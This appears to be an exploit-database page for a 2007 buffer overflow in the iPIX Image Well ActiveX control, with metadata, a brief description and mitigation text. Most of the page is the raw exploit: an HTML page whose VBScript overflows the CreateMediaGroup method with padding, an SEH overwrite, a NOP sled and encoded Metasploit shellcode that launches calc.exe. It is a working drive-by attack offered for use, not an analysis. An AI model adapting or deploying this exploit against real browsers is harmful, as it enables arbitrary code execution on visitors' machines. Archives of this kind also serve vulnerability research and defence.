header-logo
Suggest Exploit
vendor:
Image Well ActiveX
by:
Umesh Wanve
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Image Well ActiveX
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 2000 SP4 Server English, Windows 2000 SP4 Professional English
2007

IPIX Image Well ActiveX Buffer Overflow Exploit

This exploit targets the iPIX Image Well ActiveX control, specifically the CreateMediaGroup method. The vulnerability allows an attacker to execute arbitrary code by providing specially crafted parameters to the method. The exploit code includes a shellcode that executes the calc.exe program.

Mitigation:

The vendor should release a patch or update to fix the buffer overflow vulnerability. In the meantime, users should avoid visiting untrusted websites or downloading untrusted ActiveX controls.
Source

Exploit-DB raw data:

<!--

  ===============================================================================================
                        IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) Buffer Overflow Exploit
                                            By Umesh Wanve 
  ==============================================================================================   
        
  Date : 27-04-2007
 
  Reference: http://securityfocus.com/bid/23379

  Tested on Windows 2000 SP4 Server English
            Windows 2000 SP4 Professional English
 
  Desc: Many methods are vulnerable and also all parameters.
        MEthods: .EndMediaGroup , .CreateMediaGroup
       
 
  PS. This was written for educational purpose. Use it at your own risk.Author will be not be
      responsible for any damage.
 
  Always thanks to Metasploit and Stroke 

-->


<html>

<body>

<OBJECT id="target" WIDTH=445 HEIGHT=40 classid="clsid:F7A05BAC-9778-410A-9CDE-BFBD4D5D2B7F" > </OBJECT>

<script language="vbscript">

targetFile = "C:\test\iPIX-ImageWell-ipix\iPIX-ImageWell-ipix.dll"
prototype  = "Function CreateMediaGroup ( ByVal bUserID As String ,  ByVal bPassword As String ,  ByVal bGroupHandle As String ,  ByVal 
NumElements As Integer ,  ByVal bServiceType As String ,  ByVal bIPAddr As String ) As Integer"
memberName = "CreateMediaGroup"
progid     = "PWACTIVEXIMGCTLLib.PWMediaSendControl"
argCount   = 6


<!-- win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com  -->


shellcode=unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36")
shellcode=shellcode+unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41")
shellcode=shellcode+unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%34%42%30%42%30%42%50%4b%48%45%34%4e%53%4b%48%4e%47")
shellcode=shellcode+unescape("%45%30%4a%57%41%30%4f%4e%4b%58%4f%34%4a%31%4b%58%4f%35%42%42%41%30%4b%4e%49%54%4b%38%46%33%4b%38")
shellcode=shellcode+unescape("%41%30%50%4e%41%43%42%4c%49%49%4e%4a%46%38%42%4c%46%37%47%30%41%4c%4c%4c%4d%30%41%50%44%4c%4b%4e")
shellcode=shellcode+unescape("%46%4f%4b%43%46%35%46%42%46%50%45%47%45%4e%4b%58%4f%45%46%32%41%50%4b%4e%48%36%4b%38%4e%50%4b%54")
shellcode=shellcode+unescape("%4b%38%4f%35%4e%31%41%30%4b%4e%4b%58%4e%31%4b%38%41%30%4b%4e%49%38%4e%35%46%52%46%50%43%4c%41%33")
shellcode=shellcode+unescape("%42%4c%46%36%4b%48%42%44%42%53%45%58%42%4c%4a%37%4e%50%4b%38%42%44%4e%50%4b%48%42%47%4e%41%4d%4a")
shellcode=shellcode+unescape("%4b%48%4a%36%4a%30%4b%4e%49%30%4b%48%42%38%42%4b%42%50%42%50%42%50%4b%38%4a%46%4e%43%4f%35%41%43")
shellcode=shellcode+unescape("%48%4f%42%46%48%45%49%48%4a%4f%43%48%42%4c%4b%57%42%55%4a%56%42%4f%4c%38%46%50%4f%45%4a%36%4a%49")
shellcode=shellcode+unescape("%50%4f%4c%48%50%50%47%55%4f%4f%47%4e%43%36%41%56%4e%56%43%56%42%30%5a")


nop=unescape("%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90")                    

pointer_to_seh=unescape("%eb%06%90%90")

seh_handler=unescape("%a9%11%02%75")


arg1=String(4365, "A")
arg2="defaultV"
arg3="defaultV"
arg4=1
arg5="defaultV"
arg6="defaultV"


arg1=arg1+pointer_to_seh+seh_handler+nop+shellcode+nop

target.CreateMediaGroup arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 


</script>
</body>
</html>

# milw0rm.com [2007-04-27]